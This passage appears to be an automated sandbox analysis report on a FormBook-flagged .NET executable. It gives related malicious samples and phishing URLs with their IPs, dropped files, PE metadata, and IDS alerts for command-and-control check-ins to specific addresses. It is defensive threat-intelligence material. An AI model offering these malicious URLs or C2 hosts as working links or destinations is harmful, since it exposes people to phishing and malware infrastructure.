                                                                                                                                                                                                                                              https://pt.surveymonkey.com/tr/v1/te/sye1khVpXMoAOA1o9dS7KswyeoXWRMc0CsiALAVvL9R1AEKLpDw_2FQ_2BjGpzqh9gEIleg14i6r7hX4PBEN8h0srmKEUKwP1mLRZLbUUusCb9ijP9SUb3shd8eAxCFYZdX_2BMEbjAe9Z41yfltVavABteyxJzvgHPE3p8pCRndVvaQ4_3DGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                              • 213.249.67.13
                                                                                                                                                                                                                                              SaLY22oLht.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                              • 213.249.66.9
                                                                                                                                                                                                                                              https://plsdworkiqs.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                              • 213.249.67.40
                                                                                                                                                                                                                                              http://213.249.67.13/plesk-site-preview/chpostcrn.com/https/213.249.67.13/PostCH/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                              • 213.249.67.13
                                                                                                                                                                                                                                              ACPCAPO-Zam#U00f3wienie zakupu-8837837849-pl-.exeGet hashmaliciousDarkCloudBrowse
                                                                                                                                                                                                                                              • 162.55.60.2
                                                                                                                                                                                                                                              la.bot.mips.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                              • 162.36.150.140
                                                                                                                                                                                                                                              la.bot.mips.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                              • 162.10.235.95
                                                                                                                                                                                                                                              LlbpXphTu9.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                              • 162.0.211.143
                                                                                                                                                                                                                                              nCEnoU35Wv.elfGet hashmaliciousOkiruBrowse
                                                                                                                                                                                                                                              • 162.0.215.71
                                                                                                                                                                                                                                              la.bot.arm5.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                              • 162.0.101.75
                                                                                                                                                                                                                                              PO1268931024 - Bank Slip.exeGet hashmaliciousPureLog StealerBrowse
                                                                                                                                                                                                                                              • 162.0.215.244
                                                                                                                                                                                                                                              ceTv2SnPn9.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                              • 162.22.97.189
                                                                                                                                                                                                                                              Payment-Inv.exeGet hashmaliciousDarkCloudBrowse
                                                                                                                                                                                                                                              • 162.55.60.2
                                                                                                                                                                                                                                              bin.armv7l.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                              • 162.32.169.42
                                                                                                                                                                                                                                              AS-26496-GO-DADDY-COM-LLCUSla.bot.mips.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                              • 184.168.110.229
                                                                                                                                                                                                                                              la.bot.mipsel.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                              • 50.63.117.197
                                                                                                                                                                                                                                              la.bot.arm5.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                              • 132.148.42.184
                                                                                                                                                                                                                                              PayrolNotificationBenefit_.htmlGet hashmaliciousMamba2FABrowse
                                                                                                                                                                                                                                              • 72.167.33.48
                                                                                                                                                                                                                                              SecuriteInfo.com.Win32.MalwareX-gen.24889.8387.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                                              • 43.255.154.55
                                                                                                                                                                                                                                              https://www.google.co.nz/url?q=38pQvvq6xRyj7Y00xDjnlx9kIHOSozurMOiaAkImPuQJnOIWtJjqJLi6stjtDz3yh&rct=tTPSrMOiaAkImPuQJnOIWtJjqJLi6stjtFX08pQvvq6xRyj7Y00xDjnlx9kIjusucT&sa=t&url=amp%2Ftejasviolin.com%2Fcharlieir%2FXHVsNVYTNZSjG4S2Sb86eRml/amNoaW5mb0BqdW1laXJhaC5jb20=Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                              • 72.167.45.49
                                                                                                                                                                                                                                              Swift Detail 103.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                                                              • 166.62.28.135
                                                                                                                                                                                                                                              WWjjNTGdMh.vbsGet hashmaliciousAsyncRAT, PureLog StealerBrowse
                                                                                                                                                                                                                                              • 173.201.176.185
                                                                                                                                                                                                                                              Deposit-MT103-Advice - 10_17_2024 Ref_ 5b2643b83d4e9319371173f2d6400ef65933cc2b.emlGet hashmaliciousMamba2FABrowse
                                                                                                                                                                                                                                              • 166.62.88.163
                                                                                                                                                                                                                                              r0000000NT_PDF.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                              • 68.178.233.113
                                                                                                                                                                                                                                              TENCENT-NET-AP-CNTencentBuildingKejizhongyiAvenueCNhttps://app.writesonic.com/share/writing-assistant/d140c48b-3642-43bf-a085-e258c1fb4f03Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                              • 162.62.150.176
                                                                                                                                                                                                                                              attachment(1).emlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                              • 162.62.150.176
                                                                                                                                                                                                                                              powerpc.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                              • 124.157.170.101
                                                                                                                                                                                                                                              https://is.gd/6NgVrQGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                              • 49.51.77.119
                                                                                                                                                                                                                                              botnet.m68k.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                                                                                                                                              • 101.34.109.211
                                                                                                                                                                                                                                              PO 635614 635613_CQDM.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                              • 162.62.150.176
                                                                                                                                                                                                                                              m68k.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                              • 124.156.108.17
                                                                                                                                                                                                                                              byte.arm7.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                                                                                              • 101.48.49.48
                                                                                                                                                                                                                                              https://api-restauration.basiic.net/fWmcv/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                              • 162.62.150.176
                                                                                                                                                                                                                                              https://thebatallangroup.taplink.ws/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                              • 49.51.78.226

                                                                                                                                                                                                                                              JA3 Fingerprints

                                                                                                                                                                                                                                              No context

                                                                                                                                                                                                                                              Dropped Files

                                                                                                                                                                                                                                              No context

                                                                                                                                                                                                                                              Created / dropped Files

                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\QUOTE2342534.exe.log

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\QUOTE2342534.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):1216
                                                                                                                                                                                                                                              Entropy (8bit):5.34331486778365
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                                                                                                                                                                              MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                                                                                                                                                                              SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                                                                                                                                                                              SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                                                                                                                                                                              SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                              Reputation:high, very likely benign file
                                                                                                                                                                                                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):2232
                                                                                                                                                                                                                                              Entropy (8bit):5.380805901110357
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:48:lylWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMugeC/ZPUyus:lGLHyIFKL3IZ2KRH9Oug8s
                                                                                                                                                                                                                                              MD5:16AD599332DD2FF94DA0787D71688B62
                                                                                                                                                                                                                                              SHA1:02F738694B02E84FFE3BAB7DE5709001823C6E40
                                                                                                                                                                                                                                              SHA-256:452876FE504FC0DBEDBD7F8467E94F6E80002DB4572D02C723ABC69F8DF0B367
                                                                                                                                                                                                                                              SHA-512:A96158FDFFA424A4AC01220EDC789F3236C03AAA6A7C1A3D8BE62074B4923957E6CFEEB6E8852F9064093E0A290B0E56E4B5504D18113A7983F48D5388CEC747
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:@...e.................................^..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\4-4-J4

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):196608
                                                                                                                                                                                                                                              Entropy (8bit):1.121297215059106
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                                                                                                                                                                              MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                                                                                                                                                                              SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                                                                                                                                                                              SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                                                                                                                                                                              SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1fn3xrnc.cr0.psm1

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_b00qpjmh.qhf.ps1

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dvw54zey.ku1.psm1

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ztmdjh4q.hu2.ps1

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                              Static File Info

                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                              Entropy (8bit):7.9413677038231105
                                                                                                                                                                                                                                              TrID:
                                                                                                                                                                                                                                              • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                                                                                                                                                                                              • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                                                                                                                                                                                              • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                                                                                                                                                              • Windows Screen Saver (13104/52) 0.07%
                                                                                                                                                                                                                                              • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                                                                                                                              File name:QUOTE2342534.exe
                                                                                                                                                                                                                                              File size:764'928 bytes
                                                                                                                                                                                                                                              MD5:c19949939d08baee86643132d7ce7542
                                                                                                                                                                                                                                              SHA1:5c8f131cb332bb49c68ab04cc2350c224d4d4d5b
                                                                                                                                                                                                                                              SHA256:a99f8a264c968ef7d4815a0bf6d53854d7c26da69adba84750c48c58bfea7384
                                                                                                                                                                                                                                              SHA512:c05c9842cf19000fa8e00b85994869744dac2f2db220accdc9ac096a3b4df0013a735278186cf1cf8b5611d333ca66f21794341bf2ba3e79b443171dea322645
                                                                                                                                                                                                                                              SSDEEP:12288:2Cfia3jk1mxlOsUAYZ2bmbcDAekn6Eb9bbaG8LtIjCeU6Pz/xP+KcFPlF:2Yi44mzOsU32JKFJbbarIjCEb/tcFtF
                                                                                                                                                                                                                                              TLSH:D7F422502AAC5B56D1FBABF5023725A613B6B62F6835F28D4CC618ED04F7F044AD0B1B
                                                                                                                                                                                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....m...............0.................. ........@.. ....................................@................................

                                                                                                                                                                                                                                              File Icon

                                                                                                                                                                                                                                              Icon Hash:00928e8e8686b000

                                                                                                                                                                                                                                              Static PE Info

                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                              Entrypoint:0x4bbeea
                                                                                                                                                                                                                                              Entrypoint Section:.text
                                                                                                                                                                                                                                              Digitally signed:false
                                                                                                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                                                                                                              Subsystem:windows gui
                                                                                                                                                                                                                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                              Time Stamp:0xD96D0FA5 [Sat Aug 4 22:41:41 2085 UTC]
                                                                                                                                                                                                                                              TLS Callbacks:
                                                                                                                                                                                                                                              CLR (.Net) Version:
                                                                                                                                                                                                                                              OS Version Major:4
                                                                                                                                                                                                                                              OS Version Minor:0
                                                                                                                                                                                                                                              File Version Major:4
                                                                                                                                                                                                                                              File Version Minor:0
                                                                                                                                                                                                                                              Subsystem Version Major:4
                                                                                                                                                                                                                                              Subsystem Version Minor:0
                                                                                                                                                                                                                                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                                                                                                                                                              Entrypoint Preview

                                                                                                                                                                                                                                              Instruction
                                                                                                                                                                                                                                              jmp dword ptr [00402000h]
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al

                                                                                                                                                                                                                                              Data Directories

                                                                                                                                                                                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0xbbe950x4f.text
                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0xbc0000x630.rsrc
                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0xbe0000xc.reloc
                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0xb9d780x70.text
                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                                                              Sections

                                                                                                                                                                                                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                              .text0x20000xb9ef00xba0000c4c073aaddb258f9695e5c9b06f954dFalse0.9543732673891129data7.948843186706725IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                              .rsrc0xbc0000x6300x8005f04e635964b3dfbd48b36a21e6378d1False0.34033203125data3.484284373634759IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                              .reloc0xbe0000xc0x20075662875697957c447bf199d02a39469False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                                                                                                              Resources

                                                                                                                                                                                                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                                              RT_VERSION0xbc0900x3a0data0.4234913793103448
                                                                                                                                                                                                                                              RT_MANIFEST0xbc4400x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                                                                                                                                                                                                              Imports

                                                                                                                                                                                                                                              DLLImport
                                                                                                                                                                                                                                              mscoree.dll_CorExeMain

                                                                                                                                                                                                                                              Network Behavior

                                                                                                                                                                                                                                              Suricata IDS Alerts

                                                                                                                                                                                                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                                              2024-10-24T15:17:34.755819+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.549787129.226.56.20080TCP
                                                                                                                                                                                                                                              2024-10-24T15:17:34.755819+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.549787129.226.56.20080TCP
                                                                                                                                                                                                                                              2024-10-24T15:17:50.661493+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549866162.0.215.3380TCP
